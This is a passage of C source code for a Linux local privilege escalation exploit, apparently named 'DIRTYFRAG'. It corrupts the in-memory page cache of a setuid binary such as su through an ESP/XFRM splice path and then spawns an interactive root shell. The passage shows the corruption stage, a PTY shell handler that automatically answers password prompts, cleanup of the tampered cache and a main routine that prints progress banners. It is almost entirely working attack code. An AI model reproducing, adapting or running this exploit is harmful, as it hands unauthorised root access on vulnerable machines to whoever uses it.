sizeof(su_marker)) == 0 ? 0 : -1;\n}\n\nstatic int run_esp_corrupt_stage(char *detail, size_t dlen)\n{\n\tpid_t cpid = fork();\n\tif (cpid < 0) {\n\t\tsnprintf(detail, dlen, \"fork: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (cpid == 0) {\n\t\tint rc = corrupt_su();\n\t\t_exit(rc == 0 ? 0 : 10 + rc);\n\t}\n\tint wstatus;\n\tif (waitpid(cpid, &wstatus, 0) < 0) {\n\t\tsnprintf(detail, dlen, \"waitpid: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!WIFEXITED(wstatus)) {\n\t\tsnprintf(detail, dlen, \"child killed by signal %d\", WTERMSIG(wstatus));\n\t\treturn -1;\n\t}\n\tint est = WEXITSTATUS(wstatus);\n\tif (est != 0) {\n\t\tsnprintf(detail, dlen, \"%s\", corrupt_err_msg(est - 10));\n\t\treturn -1;\n\t}\n\tif (verify_patch(g_target) < 0) {\n\t\tsnprintf(detail, dlen,\n\t\t\t \"page cache unchanged at 0x%x (patched kernel / LSM / container?)\",\n\t\t\t ENTRY_OFFSET);\n\t\treturn -1;\n\t}\n\tdetail[0] = '\\0';\n\treturn 0;\n}\n\nstatic int target_is_su_binary(const char *path)\n{\n\tconst char *base = strrchr(path, '/');\n\tbase = base ? base + 1 : path;\n\treturn strcmp(base, \"su\") == 0;\n}\n\nstatic void exec_patched_target(void)\n{\n\tchar *envp[] = { \"TERM=xterm\", NULL };\n\texecle(g_target, g_target, NULL, envp);\n\t_exit(127);\n}\n\nstatic void exec_su_login(void)\n{\n\tstatic const char *paths[] = {\n\t\t\"/bin/su\", \"/usr/bin/su\", \"/sbin/su\", \"/usr/sbin/su\", NULL,\n\t};\n\tfor (int i = 0; paths[i]; i++)\n\t\texecl(paths[i], \"su\", \"-\", (char *)NULL);\n\texeclp(\"su\", \"su\", \"-\", (char *)NULL);\n\t_exit(127);\n}\n\nstatic int run_root_pty(void)\n{\n\tint master = posix_openpt(O_RDWR | O_NOCTTY);\n\tif (master < 0)\n\t\treturn -1;\n\tif (grantpt(master) < 0 || unlockpt(master) < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tchar *slave_name = ptsname(master);\n\tif (!slave_name) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\n\tstruct winsize ws;\n\tif (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)\n\t\tioctl(master, TIOCSWINSZ, &ws);\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tsetsid();\n\t\tint slave = open(slave_name, O_RDWR);\n\t\tif (slave < 0)\n\t\t\t_exit(127);\n\t\tioctl(slave, TIOCSCTTY, 0);\n\t\tdup2(slave, 0);\n\t\tdup2(slave, 1);\n\t\tdup2(slave, 2);\n\t\tif (slave > 2)\n\t\t\tclose(slave);\n\t\tclose(master);\n\t\tif (target_is_su_binary(g_target))\n\t\t\texec_su_login();\n\t\texec_patched_target();\n\t}\n\n\tsignal(SIGTTOU, SIG_IGN);\n\tsignal(SIGTTIN, SIG_IGN);\n\tsignal(SIGPIPE, SIG_IGN);\n\tsignal(SIGHUP, SIG_IGN);\n\n\tstruct termios saved_termios;\n\tint restore_termios = 0;\n\tif (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {\n\t\tstruct termios raw = saved_termios;\n\t\tcfmakeraw(&raw);\n\t\tif (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)\n\t\t\trestore_termios = 1;\n\t}\n\n\tint auto_pw_sent = 0;\n\tint stdin_eof = 0;\n\tint saw_master_output = 0;\n\tint total_ms = 0;\n\tchar buf[4096];\n\n\tfor (;;) {\n\t\tstruct pollfd pfds[2] = {\n\t\t\t{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },\n\t\t\t{ master, POLLIN, 0 },\n\t\t};\n\t\tint pr = poll(pfds, 2, 200);\n\t\tif (pr < 0 && errno != EINTR)\n\t\t\tbreak;\n\t\ttotal_ms += 200;\n\n\t\tif (pfds[1].revents & POLLIN) {\n\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tbreak;\n\t\t\tsaw_master_output = 1;\n\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\tif (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {\n\t\t\t\tbuf[n] = '\\0';\n\t\t\t\tif (strstr(buf, \"Password\") || strstr(buf, \"password\")) {\n\t\t\t\t\twrite(master, \"\\n\", 1);\n\t\t\t\t\tauto_pw_sent = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (!stdin_eof && (pfds[0].revents & POLLIN)) {\n\t\t\tssize_t n = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tstdin_eof = 1;\n\t\t\telse\n\t\t\t\twrite(master, buf, n);\n\t\t}\n\t\tif (pfds[1].revents & (POLLHUP | POLLERR))\n\t\t\tbreak;\n\n\t\tif (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {\n\t\t\twrite(master, \"\\n\", 1);\n\t\t\tauto_pw_sent = 1;\n\t\t}\n\n\t\tint status;\n\t\tpid_t w = waitpid(pid, &status, WNOHANG);\n\t\tif (w == pid) {\n\t\t\tfor (int i = 0; i < 5; i++) {\n\t\t\t\tstruct pollfd pf = { master, POLLIN, 0 };\n\t\t\t\tif (poll(&pf, 1, 50) <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\t\tif (n <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (restore_termios)\n\t\ttcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);\n\tclose(master);\n\treturn 0;\n}\n\nstatic int restore_original(void)\n{\n\tif (!g_have_backup) return -1;\n\n\t// just drop the file's page cache -> kernel reloads from disk\n\tint fd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tposix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);\n\tclose(fd);\n\n\t// verify first 8 bytes match backup (disk copy)\n\tunsigned char cur[8];\n\tfd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = pread(fd, cur, 8, 0);\n\tclose(fd);\n\tif (n != 8) return -1;\n\tif (memcmp(cur, g_backup, 8) != 0) return -1;\n\n\treturn 0;\n}\n\nstatic void parse_args(int argc, char **argv)\n{\n\tfor (int i = 1; i < argc; i++) {\n\t\tif (!strcmp(argv[i], \"-v\") || !strcmp(argv[i], \"--verbose\"))\n\t\t\tg_verbose = 1;\n\t\telse if (argv[i][0] != '-')\n\t\t\tg_target = argv[i];\n\t}\n\tif (getenv(\"DIRTYFRAG_VERBOSE\"))\n\t\tg_verbose = 1;\n}\n\nint main(int argc, char **argv)\n{\n\tg_tty = isatty(STDOUT_FILENO);\n\tsetlinebuf(stdout);\n\tparse_args(argc, argv);\n\n\tif (getuid() == 0) {\n\t\texeclp(\"/bin/bash\", \"bash\", (char *)NULL);\n\t\t_exit(1);\n\t}\n\n\tprint_banner();\n\n\tif (check_kernel_config() < 0)\n\t\treturn 1;\n\n\tif (check_userns_runtime() < 0)\n\t\treturn 1;\n\n\tif (scan_setuid_binaries() < 0)\n\t\treturn 1;\n\n\tphase_header(4, \"ESP corrupt (XFRM/UDP 4500)\");\n\tprintf(\"  %s\u2192%s target: %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_MAG), g_target, C(C_RST));\n\n\t{\n\t\tchar why[256];\n\t\tif (probe_target(g_target, why, sizeof(why)) < 0) {\n\t\t\tstatus_line(\"target\", 0, why);\n\t\t\tfprintf(stderr,\n\t\t\t\t\"\\n%s  [!] Exploit needs read+execute on the setuid binary (open for splice).%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Shared hosting often blocks reading /usr/bin/su even though 'find' lists it.%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s  [!] Use a full VM/VPS/lab where you can: cat %s | head -c 4%s\\n\\n\",\n\t\t\t\tC(C_YEL), g_target, C(C_RST));\n\t\t\treturn 1;\n\t\t}\n\t}\n\tstatus_line(\"target\", 1, \"setuid + readable + openable\");\n\n\tif (target_already_patched(g_target)) {\n\t\tstatus_line(\"patch\", 1, \"already patched \u2014 skip corrupt stage\");\n\t} else {\n\t\tif (save_original(g_target) < 0) {\n\t\t\tstatus_line(\"backup\", 0, \"failed to save 192 original bytes\");\n\t\t\treturn 1;\n\t\t}\n\t\tstatus_line(\"backup\", 1, \"192 bytes saved\");\n\n\t\tprintf(\"\\n%s  [*] unshare userns+netns, register %d XFRM SA, splice\u2192UDP 4500...%s\\n\",\n\t\t       C(C_YEL), TOTAL_SAS, C(C_RST));\n\n\t\t{\n\t\t\tchar err[256];\n\t\t\tif (run_esp_corrupt_stage(err, sizeof(err)) < 0) {\n\t\t\t\tstatus_line(\"corrupt\", 0, err[0] ? err : \"ESP path failed\");\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"\\n%s  [!] Common on shared/VPS hosts: XFRM netlink blocked, splice restricted, or kernel patched.%s\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"%s  [!] Try: uname -r  and test on WSL2/lab. Without userns: CVE-2026-43500 (rxrpc).%s\\n\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\treturn 1;\n\t\t\t}\n\t\t}\n\t\tstatus_line(\"corrupt\", 1, \"all iterations done\");\n\t\tstatus_line(\"verify\", 1, \"shellcode marker at 0x78 OK\");\n\t}\n\n\tphase_header(5, \"root shell\");\n\tprintf(\"\\n%s\", C(C_GRN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  root shell \u2014 exit to restore        \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n\n\tprintf(\"  %s\u2192%s spawn: %s%s\\n\\n\", C(C_DIM), C(C_RST), g_target, C(C_RST));\n\tif (run_root_pty() < 0) {\n\t\tstatus_line(\"pty\", 0, \"PTY failed, trying direct exec\");\n\t\texec_patched_target();\n\t\tfprintf(stderr, \"%s  [!] exec %s: %s%s\\n\", C(C_RED), g_target, strerror(errno), C(C_RST));\n\t\treturn 1;\n\t}\n\n\tprintf(\"\\n%s  [*] shell closed \u2014 restoring page cache...%s\\n\", C(C_YEL), C(C_RST));\n\tif (restore_original() < 0) {\n\t\tfprintf(stderr, \"%s  [!] restore failed \u2014 try: echo 3 | sudo tee /proc/sys/vm/drop_caches%s\\n\",\n\t\t        C(C_RED), C(C_RST));\n\t\treturn 1;\n\t}\n\tprintf(\"%s  [+] target restored from disk.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n", "creation_timestamp": "2026-05-26T12:10:20.000000Z"}